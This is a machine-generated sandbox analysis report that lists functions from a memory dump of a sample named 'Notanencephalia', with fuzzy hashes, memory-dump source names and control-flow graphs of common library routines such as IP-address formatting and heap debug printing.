                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 384cd3779ba760acdcc5c54395da1cf83a0df137ae15f7211786d22a5c024688
                                                • Instruction ID: 3277967040ce06fdf19279012d43dca6dc0a4ccd0300ba522ed1dc8a8ad6395c
                                                • Opcode Fuzzy Hash: 384cd3779ba760acdcc5c54395da1cf83a0df137ae15f7211786d22a5c024688
                                                • Instruction Fuzzy Hash: 6B90022130240003D680B1595419A1A400997E1311F95D015F0418724CD91689565222
                                                Function 1FDB2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac104390d4f363ed2d322389265eb627ec986375e3e08fdd39ba18e8047dd20b
                                                • Instruction ID: b68e9cc0d964e52795ebd32befc16b28740c988395f7e36a13cf5bed4c39f577
                                                • Opcode Fuzzy Hash: ac104390d4f363ed2d322389265eb627ec986375e3e08fdd39ba18e8047dd20b
                                                • Instruction Fuzzy Hash: D090022160640402D680B1595419B1A001947D0211F95D015B0028724DC65A8B5566A1
                                                Function 1FDB2CF0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 212ea388ba69d78c1ed78fe2527bf100dc5dfd6ebc6dd9478938da731c7edc6b
                                                • Instruction ID: 37e272d3bc3a9e9f870475c555a4360728f7ff329d74126825e060360eb39018
                                                • Opcode Fuzzy Hash: 212ea388ba69d78c1ed78fe2527bf100dc5dfd6ebc6dd9478938da731c7edc6b
                                                • Instruction Fuzzy Hash: DF90023120240403D640B1595509B1B000947D0211F95D415B0428728DD65789516121
                                                Function 1FDB2CA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 71fbdec6f45c7091e62980d17c3a9f7b64494da25acd67f4d8b19a9668eb7a9e
                                                • Instruction ID: aaa005a5753e45f2436047358ac98ef8ab7c10dca4dfaadf8e45856cb9188947
                                                • Opcode Fuzzy Hash: 71fbdec6f45c7091e62980d17c3a9f7b64494da25acd67f4d8b19a9668eb7a9e
                                                • Instruction Fuzzy Hash: 1390023120240402D640B5995409A5A000947E0311F95D015B5028725EC66689916131
                                                Function 1FDB2C60 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 19899b95045cd81c2c9a77f8b3b1cbc544b2a9f138a81c9523d4ed624d55dd5d
                                                • Instruction ID: 47ddedebfce45d140747ae074085e2b0b8b9b3bfc3af981757a63613f4525165
                                                • Opcode Fuzzy Hash: 19899b95045cd81c2c9a77f8b3b1cbc544b2a9f138a81c9523d4ed624d55dd5d
                                                • Instruction Fuzzy Hash: 0490023120240842D640B1594405F5A000947E0311F95C01AB0128724D8616C9517521
                                                Function 1FDB2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 69b29a821a5da647a5e37b3849a446eed80448fb26134776dfdc0dc94e15ab32
                                                • Instruction ID: 21acfa1365f20fa9a435b7fb328fa0ac05b2573f4e8ceaa2bb9230a16e9678eb
                                                • Opcode Fuzzy Hash: 69b29a821a5da647a5e37b3849a446eed80448fb26134776dfdc0dc94e15ab32
                                                • Instruction Fuzzy Hash: 8690023120240802D6C0B1594405A5E000947D1311FD5C019B0029724DCA168B5977A1
                                                Function 1FDB2BE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b85e33397c80739c23562504cafc6a331b78807e9661d39f4ae79e2b8303bc1e
                                                • Instruction ID: e82bd29c41bb6aa71c30f86a683bc13267004f91f972f4908baa9ab660daa8ac
                                                • Opcode Fuzzy Hash: b85e33397c80739c23562504cafc6a331b78807e9661d39f4ae79e2b8303bc1e
                                                • Instruction Fuzzy Hash: 0290023120644842D680B1594405E5A001947D0315F95C015B0068764D96268E55B661
                                                Function 1FDB2B80 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 424ba6466ffbf6e2a54f5c208ca0839754db138cf95c51b723efce782a8c2fd6
                                                • Instruction ID: 46fd1b390a58e4895f949272980aa1a9f4b73393fa6b60ac775b121e07a9f7ca
                                                • Opcode Fuzzy Hash: 424ba6466ffbf6e2a54f5c208ca0839754db138cf95c51b723efce782a8c2fd6
                                                • Instruction Fuzzy Hash: 5890023120240802D644B1594805A9A000947D0311F95C015B6028725E966689917131
                                                Function 1FDB2BA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6014d29f0e0b38d92e48fa9d78e9481c76d854c78afd2dc1aa8e2c5f553e7733
                                                • Instruction ID: f3adc29948a8c3699cf5c2c71ec54f45013a2483f78beb02a2ecf4ac8961bda9
                                                • Opcode Fuzzy Hash: 6014d29f0e0b38d92e48fa9d78e9481c76d854c78afd2dc1aa8e2c5f553e7733
                                                • Instruction Fuzzy Hash: F190023160640802D690B1594415B5A000947D0311F95C015B0028724D87568B5576A1
                                                Function 1FDB2AD0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca7acc467f184928f750c0a408a90547ff444835a31ecb9df02cf79ef69d0471
                                                • Instruction ID: 47d4a257cd779e86bdf624c90f5e7d1946fc5e336948a733c3617e017646af58
                                                • Opcode Fuzzy Hash: ca7acc467f184928f750c0a408a90547ff444835a31ecb9df02cf79ef69d0471
                                                • Instruction Fuzzy Hash: C8900225212400030645F559070591B004A47D5361395C025F1019720CD62289615121
                                                Function 1FDB2AF0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 959e8521ad9611ca9dc96e0e0e653eadbc8e8d374c1de30ab0bc0ccfcecd37da
                                                • Instruction ID: c99994c5c17e9a2f26bcb33506a3e433972bb715707233ec93e65c01d6ca5e60
                                                • Opcode Fuzzy Hash: 959e8521ad9611ca9dc96e0e0e653eadbc8e8d374c1de30ab0bc0ccfcecd37da
                                                • Instruction Fuzzy Hash: 4C900225222400020685F559060591F044957D63613D5C019F141A760CC62289655321
                                                Function 1FDB2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ddcc1b090e219f459f6258c4d9b832787d88b6dce96ecb90bb7c0f7aecf2b69
                                                • Instruction ID: 5c693944e8e4914fc68db1d2db2586ba1572e11c9cb196fc6af11c3d643273ac
                                                • Opcode Fuzzy Hash: 2ddcc1b090e219f459f6258c4d9b832787d88b6dce96ecb90bb7c0f7aecf2b69
                                                • Instruction Fuzzy Hash: BD9002A1202540924A40F2598405F1E450947E0211B95C01AF1058730CC52689519135
                                                Function 1FDB4650 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ddca1c92a4158d1a33eb830afcd07b4df9ba28c310107d0b2550a3bb7e1c4743
                                                • Instruction ID: 2b234eab7fecaa6097991e47b351b90eb7f3379fca351a6f27755928163a922b
                                                • Opcode Fuzzy Hash: ddca1c92a4158d1a33eb830afcd07b4df9ba28c310107d0b2550a3bb7e1c4743
                                                • Instruction Fuzzy Hash: 47900261602500424680B159480581A600957E13113D5C119B0558730C861989559269
                                                Function 1FDB4340 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0add34a25de426d9750563bd3ab4df81e79560b887fc8230bf8506fb1a78d6ea
                                                • Instruction ID: 5888d19f0267c7364737be960c134d47444588e511ad2c3adf232c444bf0141b
                                                • Opcode Fuzzy Hash: 0add34a25de426d9750563bd3ab4df81e79560b887fc8230bf8506fb1a78d6ea
                                                • Instruction Fuzzy Hash: 24900231606800129680B159488595A400957E0311B95C015F0428724C8A158A565361
                                                Function 1FDB2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 859ecfcfc887d91f4a1dee0beda74854dba11d03dc159cb8ac24da357358499d
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Function 1FDB2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1127 1fdb2890-1fdb28b3 1128 1fdea4bc-1fdea4c0 1127->1128 1129 1fdb28b9-1fdb28cc 1127->1129 1128->1129 1130 1fdea4c6-1fdea4ca 1128->1130 1131 1fdb28ce-1fdb28d7 1129->1131 1132 1fdb28dd-1fdb28df 1129->1132 1130->1129 1133 1fdea4d0-1fdea4d4 1130->1133 1131->1132 1134 1fdea57e-1fdea585 1131->1134 1135 1fdb28e1-1fdb28e5 1132->1135 1133->1129 1136 1fdea4da-1fdea4de 1133->1136 1134->1132 1137 1fdb28eb-1fdb28fa 1135->1137 1138 1fdb2988-1fdb298e 1135->1138 1136->1129 1142 1fdea4e4-1fdea4eb 1136->1142 1139 1fdea58a-1fdea58d 1137->1139 1140 1fdb2900-1fdb2905 1137->1140 1141 1fdb2908-1fdb290c 1138->1141 1139->1141 1140->1141 1141->1135 1143 1fdb290e-1fdb291b 1141->1143 1144 1fdea4ed-1fdea4f4 1142->1144 1145 1fdea564-1fdea56c 1142->1145 1146 1fdb2921 1143->1146 1147 1fdea592-1fdea599 1143->1147 1149 1fdea50b 1144->1149 1150 1fdea4f6-1fdea4fe 1144->1150 1145->1129 1148 1fdea572-1fdea576 1145->1148 1151 1fdb2924-1fdb2926 1146->1151 1159 1fdea5a1-1fdea5c9 call 1fdc0050 1147->1159 1148->1129 1152 1fdea57c call 1fdc0050 1148->1152 1154 1fdea510-1fdea536 call 1fdc0050 1149->1154 1150->1129 1153 1fdea504-1fdea509 1150->1153 1156 1fdb2928-1fdb292a 1151->1156 1157 1fdb2993-1fdb2995 1151->1157 1166 1fdea55d-1fdea55f 1152->1166 1153->1154 1154->1166 1163 1fdb292c-1fdb292e 1156->1163 1164 1fdb2946-1fdb2966 call 1fdc0050 1156->1164 1157->1156 1161 1fdb2997-1fdb29b1 call 1fdc0050 1157->1161 1176 1fdb2969-1fdb2974 1161->1176 1163->1164 1169 1fdb2930-1fdb2944 call 1fdc0050 1163->1169 1164->1176 1173 1fdb2981-1fdb2985 1166->1173 1169->1164 1176->1151 1178 1fdb2976-1fdb2979 1176->1178 1178->1159 1179 1fdb297f 1178->1179 1179->1173
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 5c9cf3d98607d4fd5851af218827985f01a5ecafdd56ca4390ecfaecfe3daec4
                                                • Instruction ID: dacd9efa45989a388c6733fef1931f43f48186d234b9df3cf50d4e53a7ce6493
                                                • Opcode Fuzzy Hash: 5c9cf3d98607d4fd5851af218827985f01a5ecafdd56ca4390ecfaecfe3daec4
                                                • Instruction Fuzzy Hash: 61510DBAA002577FCB92DF68CC9057EF7B8BB4A201750822DE4A9D7641D334EE0497E0
                                                Function 1FE22410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1180 1fe22410-1fe22433 1181 1fe22439-1fe2243d 1180->1181 1182 1fe224ec-1fe224ff 1180->1182 1181->1182 1183 1fe22443-1fe22447 1181->1183 1184 1fe22513-1fe22515 1182->1184 1185 1fe22501-1fe2250a 1182->1185 1183->1182 1186 1fe2244d-1fe22451 1183->1186 1188 1fe22517-1fe2251b 1184->1188 1185->1184 1187 1fe2250c 1185->1187 1186->1182 1189 1fe22457-1fe2245b 1186->1189 1187->1184 1190 1fe22538-1fe2253e 1188->1190 1191 1fe2251d-1fe2252c 1188->1191 1189->1182 1193 1fe22461-1fe22468 1189->1193 1192 1fe22543-1fe22547 1190->1192 1194 1fe22540 1191->1194 1195 1fe2252e-1fe22536 1191->1195 1192->1188 1196 1fe22549-1fe22556 1192->1196 1197 1fe224b6-1fe224be 1193->1197 1198 1fe2246a-1fe22471 1193->1198 1194->1192 1195->1192 1200 1fe22564 1196->1200 1201 1fe22558-1fe22562 1196->1201 1197->1182 1199 1fe224c0-1fe224c4 1197->1199 1202 1fe22473-1fe2247b 1198->1202 1203 1fe22484 1198->1203 1199->1182 1206 1fe224c6-1fe224ea call 1fdc0510 1199->1206 1205 1fe22567-1fe22569 1200->1205 1201->1205 1202->1182 1207 1fe2247d-1fe22482 1202->1207 1204 1fe22489-1fe224ab call 1fdc0510 1203->1204 1218 1fe224ae-1fe224b1 1204->1218 1209 1fe2256b-1fe2256d 1205->1209 1210 1fe2258d-1fe2258f 1205->1210 1206->1218 1207->1204 1209->1210 1213 1fe2256f-1fe2258b call 1fdc0510 1209->1213 1215 1fe22591-1fe22593 1210->1215 1216 1fe225ae-1fe225d0 call 1fdc0510 1210->1216 1225 1fe225d3-1fe225df 1213->1225 1215->1216 1220 1fe22595-1fe225ab call 1fdc0510 1215->1220 1216->1225 1222 1fe22615-1fe22619 1218->1222 1220->1216 1225->1205 1227 1fe225e1-1fe225e4 1225->1227 1228 1fe22613 1227->1228 1229 1fe225e6-1fe22610 call 1fdc0510 1227->1229 1228->1222 1229->1228
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: edd4e2571541774f22fa63d6e42a287f7b63824bb0b00fca50a3a829e91f2a43
                                                • Instruction ID: cee2c383464ed2af45366b7648e042671227634ff27b850d2d3a96cccb7b4236
                                                • Opcode Fuzzy Hash: edd4e2571541774f22fa63d6e42a287f7b63824bb0b00fca50a3a829e91f2a43
                                                • Instruction Fuzzy Hash: E351D475A00686AFEB24CFACCC909BFB7F9AF44204B84C459E4D5D7681FA74EA40C761
                                                Function 1FE4A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1429 1fe4a670-1fe4a6e9 call 1fd82410 * 2 RtlDebugPrintTimes 1435 1fe4a89f-1fe4a8c4 call 1fd825b0 * 2 call 1fdb4c30 1429->1435 1436 1fe4a6ef-1fe4a6fa 1429->1436 1438 1fe4a724 1436->1438 1439 1fe4a6fc-1fe4a709 1436->1439 1443 1fe4a728-1fe4a734 1438->1443 1441 1fe4a70f-1fe4a715 1439->1441 1442 1fe4a70b-1fe4a70d 1439->1442 1444 1fe4a7f3-1fe4a7f5 1441->1444 1445 1fe4a71b-1fe4a722 1441->1445 1442->1441 1447 1fe4a741-1fe4a743 1443->1447 1449 1fe4a81f-1fe4a821 1444->1449 1445->1443 1450 1fe4a745-1fe4a747 1447->1450 1451 1fe4a736-1fe4a73c 1447->1451 1452 1fe4a755-1fe4a77d RtlDebugPrintTimes 1449->1452 1453 1fe4a827-1fe4a834 1449->1453 1450->1449 1455 1fe4a74c-1fe4a750 1451->1455 1456 1fe4a73e 1451->1456 1452->1435 1465 1fe4a783-1fe4a7a0 RtlDebugPrintTimes 1452->1465 1457 1fe4a836-1fe4a843 1453->1457 1458 1fe4a85a-1fe4a866 1453->1458 1460 1fe4a86c-1fe4a86e 1455->1460 1456->1447 1462 1fe4a845-1fe4a849 1457->1462 1463 1fe4a84b-1fe4a851 1457->1463 1464 1fe4a87b-1fe4a87d 1458->1464 1460->1449 1462->1463 1466 1fe4a857 1463->1466 1467 1fe4a96b-1fe4a96d 1463->1467 1468 1fe4a870-1fe4a876 1464->1468 1469 1fe4a87f-1fe4a881 1464->1469 1465->1435 1477 1fe4a7a6-1fe4a7cc RtlDebugPrintTimes 1465->1477 1466->1458 1470 1fe4a883-1fe4a889 1467->1470 1471 1fe4a8c7-1fe4a8cb 1468->1471 1472 1fe4a878 1468->1472 1469->1470 1473 1fe4a8d0-1fe4a8f4 RtlDebugPrintTimes 1470->1473 1474 1fe4a88b-1fe4a89d RtlDebugPrintTimes 1470->1474 1476 1fe4a99f-1fe4a9a1 1471->1476 1472->1464 1473->1435 1481 1fe4a8f6-1fe4a913 RtlDebugPrintTimes 1473->1481 1474->1435 1477->1435 1482 1fe4a7d2-1fe4a7d4 1477->1482 1481->1435 1486 1fe4a915-1fe4a944 RtlDebugPrintTimes 1481->1486 1484 1fe4a7d6-1fe4a7e3 1482->1484 1485 1fe4a7f7-1fe4a80a 1482->1485 1487 1fe4a7e5-1fe4a7e9 1484->1487 1488 1fe4a7eb-1fe4a7f1 1484->1488 1489 1fe4a817-1fe4a819 1485->1489 1486->1435 1495 1fe4a94a-1fe4a94c 1486->1495 1487->1488 1488->1444 1488->1485 1490 1fe4a80c-1fe4a812 1489->1490 1491 1fe4a81b-1fe4a81d 1489->1491 1493 1fe4a814 1490->1493 1494 1fe4a868-1fe4a86a 1490->1494 1491->1449 1493->1489 1494->1460 1496 1fe4a972-1fe4a985 1495->1496 1497 1fe4a94e-1fe4a95b 1495->1497 1500 1fe4a992-1fe4a994 1496->1500 1498 1fe4a963-1fe4a969 1497->1498 1499 1fe4a95d-1fe4a961 1497->1499 1498->1467 1498->1496 1499->1498 1501 1fe4a996 1500->1501 1502 1fe4a987-1fe4a98d 1500->1502 1501->1469 1503 1fe4a98f 1502->1503 1504 1fe4a99b-1fe4a99d 1502->1504 1503->1500 1504->1476
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3372478984.000000001FD40000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD40000, based on PE: true
                                                • Associated: 0000000E.00000002.3372478984.000000001FE69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FE6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000E.00000002.3372478984.000000001FEDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1fd40000_Notanencephalia.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: HEAP:
                                                • API String ID: 3446177414-2466845122
                                                • Opcode ID: 1d178a7910f2a3aebc41c2cfbe6402b381acde4c5851ab9345c0cb146df318c3
                                                • Instruction ID: 648e9299671ad437c1e47008134fce9beab7bc5366c8c88f93a50b2ac5f9949d
                                                • Opcode Fuzzy Hash: 1d178a7910f2a3aebc41c2cfbe6402b381acde4c5851ab9345c0cb146df318c3
